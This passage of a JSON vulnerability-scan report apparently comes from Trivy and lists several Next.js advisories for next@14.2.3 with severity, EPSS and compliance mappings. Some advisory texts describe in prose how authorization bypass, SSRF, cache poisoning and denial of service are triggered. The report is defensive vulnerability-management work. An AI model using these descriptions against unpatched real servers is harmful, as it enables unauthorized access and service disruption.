"Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.39586666666667, "epss": 0.00067, "epss_percentile": 0.20499, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.00268, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8b483b8e54efe250", "ruleId": "CVE-2025-29927", "severity": "CRITICAL", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "nextjs: Authorization Bypass in Next.js Middleware", "title": "CVE-2025-29927", "description": "Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.", "remediation": "https://avd.aquasec.com/nvd/cve-2025-29927", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-285", "CWE-863" ] }, "raw": { "VulnerabilityID": "CVE-2025-29927", "VendorIDs": [ "GHSA-f82v-jwr5-mffw" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "13.5.9, 14.2.25, 15.2.3, 12.3.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-29927", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:03d8bc467ed49d9b588625219e50e54133acdb9c588237ee693b8aa0098d1007", "Title": "nextjs: Authorization Bypass in Next.js Middleware", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.", "Severity": "CRITICAL", "CweIDs": [ "CWE-285", "CWE-863" ], "VendorSeverity": { "ghsa": 4, "redhat": 4 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "V3Score": 9.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "V3Score": 9.1 } }, "References": [ "http://www.openwall.com/lists/oss-security/2025/03/23/3", "http://www.openwall.com/lists/oss-security/2025/03/23/4", "https://access.redhat.com/security/cve/CVE-2025-29927", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2", "https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48", "https://github.com/vercel/next.js/releases/tag/v12.3.5", "https://github.com/vercel/next.js/releases/tag/v13.5.9", "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw", "https://jfrog.com/blog/cve-2025-29927-next-js-authorization-bypass/", "https://nvd.nist.gov/vuln/detail/CVE-2025-29927", "https://security.netapp.com/advisory/ntap-20250328-0002", "https://security.netapp.com/advisory/ntap-20250328-0002/", "https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware", "https://www.cve.org/CVERecord?id=CVE-2025-29927" ], "PublishedDate": "2025-03-21T15:15:42.66Z", "LastModifiedDate": "2025-09-10T15:49:40.637Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A01:2021" ], "cweTop25_2024": [ { "id": "CWE-863", "rank": 24, "category": "Authorization" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 100.0, "epss": 0.92118, "epss_percentile": 0.99719, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 10, "epss_multiplier": 4.68472, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "805b9e4959b28bb7", "ruleId": "CVE-2024-46982", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js Cache Poisoning", "title": "CVE-2024-46982", "description": "Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.", "remediation": "https://avd.aquasec.com/nvd/cve-2024-46982", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-639" ] }, "raw": { "VulnerabilityID": "CVE-2024-46982", "VendorIDs": [ "GHSA-gp8f-8m3g-qvj9" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "13.5.7, 14.2.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-46982", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:8ae6ee9f6abad6c253892c7eafdf3857ac92ffe851cb6c9568fa46323bbc7084", "Title": "Next.js Cache Poisoning", "Description": "Next.js is a React framework for building full-stack web applications. By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: 1. Next.js between 13.5.1 and 14.2.9, 2. Using pages router, & 3. Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx`. This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version.", "Severity": "HIGH", "CweIDs": [ "CWE-639" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", "V3Score": 7.5, "V40Score": 8.7 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/7ed7f125e07ef0517a331009ed7e32691ba403d3", "https://github.com/vercel/next.js/commit/bd164d53af259c05f1ab434004bcfdd3837d7cda", "https://github.com/vercel/next.js/security/advisories/GHSA-gp8f-8m3g-qvj9", "https://nvd.nist.gov/vuln/detail/CVE-2024-46982" ], "PublishedDate": "2024-09-17T22:15:02.273Z", "LastModifiedDate": "2025-09-10T15:46:05.173Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A01:2021" ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 69.12453333333335, "epss": 0.49062, "epss_percentile": 0.97812, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 2.9624800000000002, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ea84684553ce61ab", "ruleId": "CVE-2024-51479", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "next.js: next: authorization bypass in Next.js", "title": "CVE-2024-51479", "description": "Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.", "remediation": "https://avd.aquasec.com/nvd/cve-2024-51479", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-285", "CWE-863" ] }, "raw": { "VulnerabilityID": "CVE-2024-51479", "VendorIDs": [ "GHSA-7gfc-8cq8-jh5f" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.15", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-51479", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:ffe1fe8cd242722c48ed9d1d21d64c4678d5fece8d35a42fb15072938ea11c55", "Title": "next.js: next: authorization bypass in Next.js", "Description": "Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.", "Severity": "HIGH", "CweIDs": [ "CWE-285", "CWE-863" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-51479", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b", "https://github.com/vercel/next.js/releases/tag/v14.2.15", "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f", "https://nvd.nist.gov/vuln/detail/CVE-2024-51479", "https://www.cve.org/CVERecord?id=CVE-2024-51479" ], "PublishedDate": "2024-12-17T19:15:06.697Z", "LastModifiedDate": "2025-09-10T15:48:08.253Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A01:2021" ], "cweTop25_2024": [ { "id": "CWE-863", "rank": 24, "category": "Authorization" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 96.60839999999999, "epss": 0.78509, "epss_percentile": 0.99056, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 4.140359999999999, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "668e2a15050688ec", "ruleId": "CVE-2026-44573", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js has a Middleware / Proxy bypass in Pages Router applications using i18n", "title": "CVE-2026-44573", "description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router with i18n configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less /_next/data//.json requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. This vulnerability is fixed in 15.5.16 and 16.2.5.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44573", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-863" ] }, "raw": { "VulnerabilityID": "CVE-2026-44573", "VendorIDs": [ "GHSA-36qx-fr4f-26g5" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44573", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:bd9906f4d5b485ab232b2dbc5a0fba6ec53cd6439edf9b78c2790429b6f3bb2d", "Title": "Next.js has a Middleware / Proxy bypass in Pages Router applications using i18n", "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router with i18n configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less /_next/data//.json requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "HIGH", "CweIDs": [ "CWE-863" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5", "https://nvd.nist.gov/vuln/detail/CVE-2026-44573" ], "PublishedDate": "2026-05-13T17:16:22.627Z", "LastModifiedDate": "2026-05-14T12:24:22.91Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A01:2021" ], "cweTop25_2024": [ { "id": "CWE-863", "rank": 24, "category": "Authorization" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.381866666666667, "epss": 0.00052, "epss_percentile": 0.1631, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.00208, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6cbf7b1b47550df1", "ruleId": "CVE-2026-44578", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js vulnerable to server-side request forgery in applications using WebSocket upgrades", "title": "CVE-2026-44578", "description": "Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.", "remediation": "https://avd.aquasec.com/nvd/cve-2026-44578", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "risk": { "cwe": [ "CWE-918" ] }, "raw": { "VulnerabilityID": "CVE-2026-44578", "VendorIDs": [ "GHSA-c4j6-fc7j-m34r" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44578", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:4b00929401561b3189dd6335cdbb89b9957345f4d80a9420d54dbe8defe083a4", "Title": "Next.js vulnerable to server-side request forgery in applications using WebSocket upgrades", "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "HIGH", "CweIDs": [ "CWE-918" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "V3Score": 8.6 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r", "https://nvd.nist.gov/vuln/detail/CVE-2026-44578" ], "PublishedDate": "2026-05-13T18:16:17.99Z", "LastModifiedDate": "2026-05-14T18:34:38.53Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "owaspTop10_2021": [ "A10:2021" ], "cweTop25_2024": [ { "id": "CWE-918", "rank": 19, "category": "SSRF" } ], "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 27.510933333333334, "epss": 0.04476, "epss_percentile": 0.89216, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.17904, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "091bd6d2c4384d47", "ruleId": "GHSA-5j59-xgg2-r9c4", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up", "title": "GHSA-5j59-xgg2-r9c4", "description": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.", "remediation": "https://github.com/advisories/GHSA-5j59-xgg2-r9c4", "references": [], "tags": [ "vulnerability", "pkg:next@14.2.3" ], "raw": { "VulnerabilityID": "GHSA-5j59-xgg2-r9c4", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.35, 15.0.7, 15.1.11, 15.2.8, 15.3.8, 15.4.10, 15.5.9, 15.6.0-canary.60, 16.0.10, 16.1.0-canary.19", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-5j59-xgg2-r9c4", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:c465b7761effe6b822ac2a802014aa01002d62640427a73b62a2a571e081fe24", "Title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up", "Description": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4", "https://nextjs.org/blog/security-update-2025-12-11", "https://nvd.nist.gov/vuln/detail/CVE-2025-67779", "https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components", "https://www.cve.org/CVERecord?id=CVE-2025-55184", "https://www.facebook.com/security/advisories/cve-2025-67779" ], "PublishedDate": "2025-12-12T17:21:57Z", "LastModifiedDate": "2026-01-15T21:55:04Z" }, "context": { "sbom": { "name": "next", "version": "14.2.3", "path": "/package-lock.json" } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 23.333333333333336, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 7, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2dd16d93f72241ba", "ruleId": "GHSA-8h8q-6873-q5fj", "severity": "HIGH", "tool": { "name": "trivy", "version": "unknown" }, "location": { "path": "package-lock.json", "startLine": 0 }, "message": "Next.js Vulnerable to Denial of Service with Server Components", "title": "GHSA-8h8q-6873-q5fj", "description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh). \n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", "remediation": 